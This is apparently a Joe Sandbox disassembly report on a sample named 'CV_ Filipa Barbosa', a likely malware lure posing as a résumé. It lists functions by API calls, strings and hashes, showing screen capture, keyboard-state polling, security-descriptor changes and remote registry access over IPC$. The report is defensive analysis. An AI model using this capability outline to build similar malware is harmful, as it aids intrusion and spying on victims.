Part of subcall function 0032ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0032ABD7
Part of subcall function 0032ABBB: GetLastError.KERNEL32(?,0032A69F,?,?,?), ref: 0032ABE1
Part of subcall function 0032ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0032A69F,?,?,?), ref: 0032ABF0
Part of subcall function 0032ABBB: HeapAlloc.KERNEL32(00000000,?,0032A69F,?,?,?), ref: 0032ABF7
Part of subcall function 0032ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0032AC0E

Part of subcall function 0032AC56: GetProcessHeap.KERNEL32(00000008,0032A6B5,00000000,00000000,?,0032A6B5,?), ref: 0032AC62
Part of subcall function 0032AC56: HeapAlloc.KERNEL32(00000000,?,0032A6B5,?), ref: 0032AC69
Part of subcall function 0032AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0032A6B5,?), ref: 0032AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0032A8CB
_memset.LIBCMT ref: 0032A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0032A8FF
GetLengthSid.ADVAPI32(?), ref: 0032A910
GetAce.ADVAPI32(?,00000000,?), ref: 0032A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0032A969
GetLengthSid.ADVAPI32(?), ref: 0032A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0032A995
HeapAlloc.KERNEL32(00000000), ref: 0032A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0032A9BD
CopySid.ADVAPI32(00000000), ref: 0032A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0032A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0032AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0032AA2F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 19541e055134f4c71d62e71089268c8c0ba536012de090b0ec61f15fc71b0f2f
Instruction ID: d447b16618dd8b79cd5e27bb66ba916b71c560a7bf228b3efdfda2cc50d99a2e
Opcode Fuzzy Hash: 19541e055134f4c71d62e71089268c8c0ba536012de090b0ec61f15fc71b0f2f
Instruction Fuzzy Hash: 3C518EB1900619AFDF12DF90EC84EEEBBB9FF04300F048129F915AB290DB309A45CB61

Function 00349DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00349E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00349E42
CreateCompatibleDC.GDI32(?), ref: 00349E4E
SelectObject.GDI32(00000000,?), ref: 00349E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00349EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00349EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00349F0F
SelectObject.GDI32(00000006,?), ref: 00349F17
DeleteObject.GDI32(?), ref: 00349F20
DeleteDC.GDI32(00000006), ref: 00349F27
ReleaseDC.USER32(00000000,?), ref: 00349F32

Strings

(, xrefs: 00349ED7

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 2627e54fe3c48afde646232ce5c6c3f7feead6f5593b508e736813540c010e73
Instruction ID: c87c22c2d86afaf51bb3d62b8791ac336deaac0643ffa109ed28312a48e05690
Opcode Fuzzy Hash: 2627e54fe3c48afde646232ce5c6c3f7feead6f5593b508e736813540c010e73
Instruction Fuzzy Hash: D4513B75900309EFCB26CFA8DC85EAEBBB9EF48710F14841DF959AB250C731A941CB50

Function 0033CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0033CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0033CCC5
__swprintf.LIBCMT ref: 0033CD1E
__swprintf.LIBCMT ref: 0033CD37
_wprintf.LIBCMT ref: 0033CDED
_wprintf.LIBCMT ref: 0033CE0B

Strings

"%s" (%d) : ==> %s:, xrefs: 0033CE06
^ ERROR, xrefs: 0033CD8F
"%s" (%d) : ==> %s:%s%s, xrefs: 0033CDE8
Line %d (File "%s"):, xrefs: 0033CD18, 0033CD31
Error: , xrefs: 0033CDB5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 258fade7638eac5f19a6c4da7c411438b365ad442936b5d3aacfed9abfadff69
Instruction ID: ae76bd7c41d990c1921885a866ec5c99357b054a09952321c275483105bc8df7
Opcode Fuzzy Hash: 258fade7638eac5f19a6c4da7c411438b365ad442936b5d3aacfed9abfadff69
Instruction Fuzzy Hash: 80514C3181011DAACB16FBA0CD86EEFF778AF09344F100165F605761A2EB716E69DF61

Function 0033CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0033CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0033CAB0
__swprintf.LIBCMT ref: 0033CB09
__swprintf.LIBCMT ref: 0033CB22
_wprintf.LIBCMT ref: 0033CBCD
_wprintf.LIBCMT ref: 0033CBEB

Strings

"%s" (%d) : ==> %s:, xrefs: 0033CBE6
"%s" (%d) : ==> %s:%s%s, xrefs: 0033CBC8
^ ERROR , xrefs: 0033CB64
Line %d (File "%s"):, xrefs: 0033CB03, 0033CB1C
Error: , xrefs: 0033CB95

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 1a1cc24ada96f5565f00096b1bfb311ffd6ab4087fb8c00f9b10ae83ae3826b8
Instruction ID: 8be8145a5312cc1027d7cb291bef6128233e53b739b4b4e4c9d22bdbfa4e3ba6
Opcode Fuzzy Hash: 1a1cc24ada96f5565f00096b1bfb311ffd6ab4087fb8c00f9b10ae83ae3826b8
Instruction Fuzzy Hash: 2D517E3181011DAACB16FBA0CD86EEFF778AF08344F100165F60576092EB756E69DF61

Function 00353C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00352BB5,?,?), ref: 00353C1D

Strings

HKEY_CLASSES_ROOT, xrefs: 00353C96
HKEY_USERS, xrefs: 00353D04
HKLM, xrefs: 00353C81
$E:, xrefs: 00353C36
HKCR, xrefs: 00353CAB
HKEY_LOCAL_MACHINE, xrefs: 00353C6C
HKCC, xrefs: 00353CD1
HKU, xrefs: 00353D15
HKEY_CURRENT_CONFIG, xrefs: 00353CC0
HKCU, xrefs: 00353CF3
HKEY_CURRENT_USER, xrefs: 00353CE2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharUpper
String ID: $E:$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-2638670893
Opcode ID: d9036682a24c99405bec0d53dfad9b4d159085f69580868df53cdc64917c5ba6
Instruction ID: d63e75e807b7586fc313210ff0af4ac6373b10e7c4b09f9283f1dd73ab62c586
Opcode Fuzzy Hash: d9036682a24c99405bec0d53dfad9b4d159085f69580868df53cdc64917c5ba6
Instruction Fuzzy Hash: E5414F3461024A8BDF07EF14D851AEA73B5EF53381F514828EC551B2B2EBB19E1ECB50

Function 003355BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003355D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00335664
GetMenuItemCount.USER32(003B1708), ref: 003356ED
DeleteMenu.USER32(003B1708,00000005,00000000,000000F5,?,?), ref: 0033577D
DeleteMenu.USER32(003B1708,00000004,00000000), ref: 00335785
DeleteMenu.USER32(003B1708,00000006,00000000), ref: 0033578D
DeleteMenu.USER32(003B1708,00000003,00000000), ref: 00335795
GetMenuItemCount.USER32(003B1708), ref: 0033579D
SetMenuItemInfoW.USER32(003B1708,00000004,00000000,00000030), ref: 003357D3
GetCursorPos.USER32(?), ref: 003357DD
SetForegroundWindow.USER32(00000000), ref: 003357E6
TrackPopupMenuEx.USER32(003B1708,00000000,?,00000000,00000000,00000000), ref: 003357F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00335805

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 07fcb32232aba1ec2e4eea71b4b3965c5ace985fbd42c643de9a7ba39a1cdfdc
Instruction ID: 52e10235e31e9c6f26ce5a0d444fe0ad125123fa341f3d44069c798e172d020e
Opcode Fuzzy Hash: 07fcb32232aba1ec2e4eea71b4b3965c5ace985fbd42c643de9a7ba39a1cdfdc
Instruction Fuzzy Hash: AB710670640605BFEB229F55DCCAFAABF69FF00368F644205F618AA1E0C7716C50DB90

Function 0032A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0032A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0032A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0032A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0032A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0032A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0032A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0032A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0032A2AB

Strings

\CLSID, xrefs: 0032A193
\IPC$, xrefs: 0032A1F3
SOFTWARE\Classes\, xrefs: 0032A17D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 064fcbc95c82042ff159a34f866eac335b06b69a1f5b26a18cea0e147de32e1b
Instruction ID: 162369198c967c33622f87da1d23f4cc5ae34f059d5332931c713bf331d78f96
Opcode Fuzzy Hash: 064fcbc95c82042ff159a34f866eac335b06b69a1f5b26a18cea0e147de32e1b
Instruction Fuzzy Hash: 2B410676C1062DABDB22EBA4EC85DEEB778FF04340F014029F905A7161EA34AE55CF90

Function 003367E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 003367FD
__swprintf.LIBCMT ref: 0033680A

Part of subcall function 0031172B: __woutput_l.LIBCMT ref: 00311784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00336834
LoadResource.KERNEL32(?,00000000), ref: 00336840
LockResource.KERNEL32(00000000), ref: 0033684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0033686D
LoadResource.KERNEL32(?,00000000), ref: 0033687F
SizeofResource.KERNEL32(?,00000000), ref: 0033688E
LockResource.KERNEL32(?), ref: 0033689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003368F9

Strings

5:, xrefs: 003367F6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5:
API String ID: 1433390588-2148306840
Opcode ID: 20055a7e16d7e6676f214ccf557a0d58f9e18f49b055c959350274745b525db8
Instruction ID: cd3a29c760a0ea533e941cd232ac9b6ce19d1db3cf6ce801245f7c153e91f135
Opcode Fuzzy Hash: 20055a7e16d7e6676f214ccf557a0d58f9e18f49b055c959350274745b525db8
Instruction Fuzzy Hash: FB318E7190021ABFDB129F60DD96ABEBBBCEF08340F018825F906E6151E734D952DBA0

Function 003325B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003636F4,00000010,?,Bad directive syntax error,0038DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003325D6
LoadStringW.USER32(00000000,?,003636F4,00000010), ref: 003325DD
_wprintf.LIBCMT ref: 00332610
__swprintf.LIBCMT ref: 00332632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003326A1

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 0033260B
., xrefs: 00332687
Line %d:, xrefs: 0033262C
Line %d (File "%s"):, xrefs: 00332647
Error: , xrefs: 0033266F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: f308e443bbdee983284f8cd661f963259a59b243fa2e3357bef841ae9d5db9ee
Instruction ID: eaeeba974d436789d489cc621b7e1bfcaa101471af76c6ca36f0f34d8ec012d0
Opcode Fuzzy Hash: f308e443bbdee983284f8cd661f963259a59b243fa2e3357bef841ae9d5db9ee
Instruction Fuzzy Hash: 0A215E3191021EAFCF16AF90CC4AEFEB739FF19344F000465F605660A2DA71A664DF50

Function 00337AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00337B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00337B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00337B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00337B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00337B8C

Strings

alias PlayMe, xrefs: 00337B1B
close PlayMe, xrefs: 00337B53, 00337B80
status PlayMe mode, xrefs: 00337B3D
open , xrefs: 00337AF1
play PlayMe wait, xrefs: 00337B76
play PlayMe, xrefs: 00337B87

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 2531f7de5284742ea6a18de2e3a464d1235ca112f5484c10b7b3698895f8e40c
Instruction ID: ecf27f2c5b6d13824ac26aa70f94616ed053436d514f074002908a80c3262e86
Opcode Fuzzy Hash: 2531f7de5284742ea6a18de2e3a464d1235ca112f5484c10b7b3698895f8e40c
Instruction Fuzzy Hash: BA11C4E065026D79D721B761CC8ADFFFABCEBD2B50F000429B511A20C1DA601A44CAB0

Function 0033778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00337794

Part of subcall function 0030DC38: timeGetTime.WINMM(?,75C0B400,003658AB), ref: 0030DC3C

Sleep.KERNEL32(0000000A), ref: 003377C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003377E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00337806
SetActiveWindow.USER32 ref: 00337825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00337833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00337852
Sleep.KERNEL32(000000FA), ref: 0033785D
IsWindow.USER32 ref: 00337869
EndDialog.USER32(00000000), ref: 0033787A

Strings

BUTTON, xrefs: 003377F8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 7f8dac5c91bf3208a189b5595808754585d1781fee061d9ee6b8aba213cf818a
Instruction ID: 8c2ee280a01b65c357f1014c2bd2383f90a94247416cfcdc7fb45ed88b0f9542
Opcode Fuzzy Hash: 7f8dac5c91bf3208a189b5595808754585d1781fee061d9ee6b8aba213cf818a
Instruction Fuzzy Hash: 18214DB4204209AFE7235F60ECD9B763FBDFB45359F400528F64A9A162CB719D40DB20

Function 003402EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

CoInitialize.OLE32(00000000), ref: 0034034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003403DE
SHGetDesktopFolder.SHELL32(?), ref: 003403F2
CoCreateInstance.OLE32(0037DA8C,00000000,00000001,003A3CF8,?), ref: 0034043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003404AD
CoTaskMemFree.OLE32(?,?), ref: 00340505
_memset.LIBCMT ref: 00340542
SHBrowseForFolderW.SHELL32(?), ref: 0034057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003405A1
CoTaskMemFree.OLE32(00000000), ref: 003405A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003405DF
CoUninitialize.OLE32(00000001,00000000), ref: 003405E1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 04b51fce48d6bec5bcf1e1d66614e4e92e36eef51ca2044dbac5515b9dbd4d48
Instruction ID: 3ee8c69917adbfb3913e1281d2abaa213e13cc837beba1f2cf9dcf4cf278d1cf
Opcode Fuzzy Hash: 04b51fce48d6bec5bcf1e1d66614e4e92e36eef51ca2044dbac5515b9dbd4d48
Instruction Fuzzy Hash: A7B1C675A10209AFDB15DFA4C889DAEBBB9EF49304F1484A9E909EB251DB30ED41CF50

Function 00332E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00332ED6
SetKeyboardState.USER32(?), ref: 00332F41
GetAsyncKeyState.USER32(000000A0), ref: 00332F61
GetKeyState.USER32(000000A0), ref: 00332F78
GetAsyncKeyState.USER32(000000A1), ref: 00332FA7
GetKeyState.USER32(000000A1), ref: 00332FB8
GetAsyncKeyState.USER32(00000011), ref: 00332FE4
GetKeyState.USER32(00000011), ref: 00332FF2
GetAsyncKeyState.USER32(00000012), ref: 0033301B
GetKeyState.USER32(00000012), ref: 00333029
GetAsyncKeyState.USER32(0000005B), ref: 00333052
GetKeyState.USER32(0000005B), ref: 00333060

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 92b97efc477b48d8c551696dbaca78d6aae49fada66a205166ded8760e353607
Instruction ID: 93dac08ffbd0f5addcc2bc5be60da27fbc3ec497a207eed007387fc3f8d564e7
Opcode Fuzzy Hash: 92b97efc477b48d8c551696dbaca78d6aae49fada66a205166ded8760e353607
Instruction Fuzzy Hash: 1951B87090879429FB37DBA488917EBBFF49F12340F09859DD5C25A1C2DA549B8CC7A2

Function 0032ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0032ED1E
GetWindowRect.USER32(00000000,?), ref: 0032ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0032ED8E
GetDlgItem.USER32(?,00000002), ref: 0032ED99
GetWindowRect.USER32(00000000,?), ref: 0032EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0032EE01
GetDlgItem.USER32(?,000003E9), ref: 0032EE0F
